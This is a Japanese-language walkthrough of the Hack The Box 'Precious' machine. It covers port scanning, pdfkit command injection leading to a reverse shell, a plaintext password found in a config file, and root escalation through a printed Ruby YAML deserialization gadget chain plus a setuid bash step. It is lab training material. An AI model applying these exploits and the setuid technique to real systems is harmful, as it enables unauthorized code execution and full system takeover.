🐶

[Hack The Box]Precious writeup

2023/12/09に公開

htb

penetration

tech

★4.6の勉強になりそうなマシン、exiftoolなどのツールの勉強にもなるマシン

openvpn

┌──(kali㉿kali)-[/home/kali.org]
└─$ sudo openvpn /home/kali/Downloads/lab_ryotaromosao.ovpn
[sudo] kali のパスワード:
2023-12-09 14:30:15 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2023-12-09 14:30:15 Note: --data-cipher-fallback with cipher 'AES-128-CBC' disables data channel offload.
2023-12-09 14:30:15 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-12-09 14:30:15 library versions: OpenSSL 3.0.9 30 May 2023, LZO 2.10
2023-12-09 14:30:15 DCO version: N/A
2023-12-09 14:30:18 TCP/UDP: Preserving recently used remote address: [AF_INET]23.106.38.195:1337

USER PRIVILEGES

nmap

┌──(kali㉿kali)-[/home/kali.org]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.189 -sSV -Pn
[sudo] kali のパスワード:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 14:32 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 14:32
Scanning 10.10.11.189 [1000 ports]
Discovered open port 80/tcp on 10.10.11.189
Discovered open port 22/tcp on 10.10.11.189
Increasing send delay for 10.10.11.189 from 0 to 5 due to 393 out of 982 dropped probes since last increase.
Increasing send delay for 10.10.11.189 from 5 to 10 due to 409 out of 1022 dropped probes since last increase.
Completed SYN Stealth Scan at 14:32, 1.61s elapsed (1000 total ports)
Initiating Service scan at 14:32
Scanning 2 services on 10.10.11.189
Completed Service scan at 14:32, 6.66s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.189.
Initiating NSE at 14:32
Completed NSE at 14:32, 1.23s elapsed
Initiating NSE at 14:32
Completed NSE at 14:32, 1.23s elapsed
Nmap scan report for 10.10.11.189
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.14 seconds
           Raw packets sent: 3068 (134.992KB) | Rcvd: 2383 (95.328KB)

port22と80が開いていた
port80が開いてるということはwebサイトがあるはずなので見に行く
おそらくwebサイトの何かしらの脆弱性を利用してpasswordを見つけ、sshでマシンにつなぐ流れだろう
まずは、precious.htbの名前解決をするために/etc/hostsに登録をする

┌──(kali㉿kali)-[/home/kali.org]
└─$ sudo vim /etc/hosts                              
127.0.0.1	localhost
10.10.11.214 pc.htb
127.0.1.1 kali
10.10.11.189 precious.htb

これで準備完了
しかし、自分はいつも（時間短縮のため）webを見に行く前にffufでディレクトリ探索とサブドメイン検索を回しておくようにしている

ffuf

ffufの使い方はcheat.shに教えてもらう

┌──(kali㉿kali)-[/home/kali.org]
└─$ curl cheat.sh/ffuf
# ffuf
# Subdomain and directory discovery tool.
# More information: <https://github.com/ffuf/ffuf>.

# Discover directories using a [w]ordlist on a target [u]rl with [c]olorized and [v]erbose output:
ffuf -w path/to/wordlist -u https://target/FUZZ -c -v

# Fuzz host-[H]eaders with a host file on a target website and [m]atch HTTP 200 [c]ode responses:
ffuf -w hosts.txt -u https://example.org -H "Host: FUZZ" -mc 200

# Discover directories using a [w]ordlist on a target website with a max individual job time of 60 seconds and recursion discovery depth of 2 levels:
ffuf -w path/to/wordlist -u https://target/FUZZ -maxtime-job 60 -recursion -recursion-depth 2

# Fuzz GET parameter on a target website and [f]ilter out message [s]ize response of 4242 bytes:
ffuf -w path/to/param_names.txt -u https://target/script.php?FUZZ=test_value -fs 4242

# Fuzz POST method with POST [d]ata of password on a target website and [f]ilter out HTTP response [c]ode 401:
ffuf -w path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401

# Discover subdomains using a subdomain list on a target website:
ffuf -w subdomains.txt -u https://website.com -H "Host: FUZZ.website.com"

1 まずはディレクトリ探索

┌──(kali㉿kali)-[/home/kali.org]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.10.11.233 -H "Host:FUZZ.analytics.htb" -fc 302

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.233
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.analytics.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 302
________________________________________________

[WARN] Caught keyboard interrupt (Ctrl-C)

2 次にサブドメイン検索

┌──(kali㉿kali)-[/home/kali.org]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://10.10.11.189 -H "Host:FUZZ.precious.htb" -fc 302

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.189
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.precious.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response status: 302
________________________________________________

:: Progress: [19966/19966] :: Job [1/1] :: 113 req/sec :: Duration: [0:02:30] :: Errors: 0 ::

特に目ぼしいものはなし(´；ω；`)ｳｩｩ
webサイトを見に行く

web enumeration

何かのページをpdfに変換してくれるurlのようだ

適当に検索したwebページを入力してみたが、リモートのURLはloadできないようだ

ということはローカルのページ？

httpサーバーを立ち上げる

┌──(kali㉿kali)-[/]
└─$ python3 -m  http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [09/Dec/2023 14:52:19] "GET / HTTP/1.1" 200 -

お！確かにpdf化された！

pdfをダウンロードしてみてexiftoolでmetadataを調べてみる
exiftoolはファイルから色々なmetadataを抽出してくれる強力なツールである

exiftool

In Kali Linux, Exiftool is a powerful tool used for viewing, editing, and extracting metadata from image files. It is a command-line tool that can be used to manipulate image metadata, such as EXIF tags, GPS data, and other embedded data. Exiftool can be used to view, edit, and create new metadata fields in image files. It can also be used to extract metadata from image files and save it in a separate file. Exiftool is a powerful tool that can be used to view, edit, and extract metadata from image files.

┌──(kali㉿kali)-[/home/kali.org/Machine/precious]
└─$ exiftool 2djwp6b97myzj1wcls10qzstm2zjqht0.pdf 
ExifTool Version Number         : 12.63
File Name                       : 2djwp6b97myzj1wcls10qzstm2zjqht0.pdf
Directory                       : .
File Size                       : 20 kB
File Modification Date/Time     : 2023:12:09 15:00:24+09:00
File Access Date/Time           : 2023:12:09 15:00:24+09:00
File Inode Change Date/Time     : 2023:12:09 15:02:24+09:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

ここで怪しいのはGenerated by pdfkit v0.8.6
特にバージョン情報が出ているとexploitを調べたくなる

pdfkit Command Injection（CVE-2022-25765）

この記事によると、コマンドインジェクションの脆弱性があるらしい
色々試してみて、このpayloadで発火した

ここまでくると、あとはリバースシェルを取りに行くだけだ
burpsuiteに移る
Reverse Shell Generatorを用いる

それをCyberchefでURLエンコード

ncでリッスンすると…

┌──(kali㉿kali)-[/home/kali.org]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.11.189] 39562
/bin/sh: 0: can't access tty; job control turned off
$

はいきたー！( ﾟДﾟ)/ シェルが帰ってきたら、まずはシェルの安定化を行う
安定化しないとCtrl + Zや↑``↓やTabの補完機能が使えないからだ
HackTricsさんのこの記事を参考に行う

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ruby@precious:/var/www/pdfapp$ ^Z
zsh: suspended  nc -lvnp 4444

┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
[1]  + continued  nc -lvnp 4444
                               ls
app  config  config.ru  Gemfile  Gemfile.lock  pdf  public
ruby@precious:/var/www/pdfapp$

これで安定化できた、user.txtを探しに行く

ruby@precious:/home/henry$ cat user.txt 
cat: user.txt: Permission denied

ruby@precious:/home/henry$ ls -la
total 24
drwxr-xr-x 2 henry henry 4096 Oct 26  2022 .
drwxr-xr-x 4 root  root  4096 Oct 26  2022 ..
lrwxrwxrwx 1 root  root     9 Sep 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26  2022 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26  2022 .bashrc
-rw-r--r-- 1 henry henry  807 Sep 26  2022 .profile
-rw-r----- 1 root  henry   33 Dec  9 00:14 user.txt

henryの権限がないと見れないらしい、いろいろ探してみる
すると/home/ruby/.bundle/configにhenryのpasswordがあった

ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

これでスイッチユーザーできたので、user.txtが取れた！

ruby@precious:~/.bundle$ su henry
Password: 
henry@precious:/home/ruby/.bundle$

PRIVILEGE ESCALATION

alias

user権限が取れたら、aliasで自分のお気に入りのコマンドを登録することをお勧めする
特にls -laはよく使うので自分はllで登録している

henry@precious:~$ alias ll="ls -la"
henry@precious:~$ ll
total 3064
drwxr-xr-x 2 henry henry    4096 Dec  9 02:53 .
drwxr-xr-x 4 root  root     4096 Oct 26  2022 ..
lrwxrwxrwx 1 root  root        9 Sep 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry     220 Sep 26  2022 .bash_logout
-rw-r--r-- 1 henry henry    3526 Sep 26  2022 .bashrc
-rw-r--r-- 1 henry henry     616 Dec  9 02:52 dependencies.yml
-rw-r--r-- 1 henry henry     616 Dec  9 02:52 dependencies.yml.1
-rw-r--r-- 1 henry henry     807 Sep 26  2022 .profile
-rwxr-xr-x 1 henry henry 3104768 Dec  9 02:21 pspy64
-rw-r----- 1 root  henry      33 Dec  9 00:14 user.txt

では！いつも通りhenry(or ruby)がroot権限で実行できるものがないかを確認する

sudo -l

henry@precious:/home/ruby/.bundle$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:/home/ruby/.bundle$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

ほお、パスワード無しにruby update_dependencies.rbを実行できるらしい

/opt/update_dependencies.rb

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

YAML.load(File.read("dependencies.yml"))が気になる
dependencies.ymlを探してみる

henry@precious:/opt$ find / -name 'dependencies.yml' 2>/dev/null
/opt/sample/dependencies.yml

/opt/sample/dependencies.yml

yaml: 0.1.1
pdfkit: 0.8.6

ここでyaml load dependencies.ymlで調べてみるとCVE-2022-32224が見つかった

Possible RCE escalation bug（CVE-2022-32224）

RedHat

An insecure deserialization flaw was found in Active Record, which uses YAML.unsafe_load to convert the YAML data into Ruby objects. An attacker supplying crafted data to the database can perform remote code execution (RCE), resulting in complete system compromise.

Active RecordではDBの絡むにserialize属性が指定でき、これはDBにシリアライズしたオブジェクトを保存可能にするものだが、保存された値をデシリアライズするときにYAML_unsafe_loadが使われているので危険らしい
Ruby3.1からはYAML.loadのデフォルトがYAML/safe_loadに変更され、デフォルトで安全になったらしい

では実際に発火させるために色々調べてみる

この記事を参考にdependencies.ymlを作成する
ターゲットマシンではvimが使えなかったりと、いろいろ不便なので、自分のマシンでPoCコードを書いてから、ターゲットマシンに転送している

dependencies.yml

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

では実行してみる！

henry@precious:~$ /usr/bin/ruby /opt/update_dependencies.rb 
sh: 1: reading: not found
uid=1000(henry) gid=1000(henry) groups=1000(henry)
Traceback (most recent call last):
	33: from /opt/update_dependencies.rb:17:in `<main>'
	32: from /opt/update_dependencies.rb:10:in `list_from_file'
	31: from /usr/lib/ruby/2.7.0/psych.rb:279:in `load'
	30: from /usr/lib/ruby/2.7.0/psych/nodes/node.rb:50:in `to_ruby'
	29: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'
	28: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:6:in `accept'
	27: from /usr/lib/ruby/2.7.0/psych/visitors/visitor.rb:16:in `visit'
	26: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:313:in `visit_Psych_Nodes_Document'
	25: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:32:in `accept'

idの実行結果が出力されているので、発火していることが分かる
ここまでくると後は簡単
id→chmod +s /bin/bashに変更する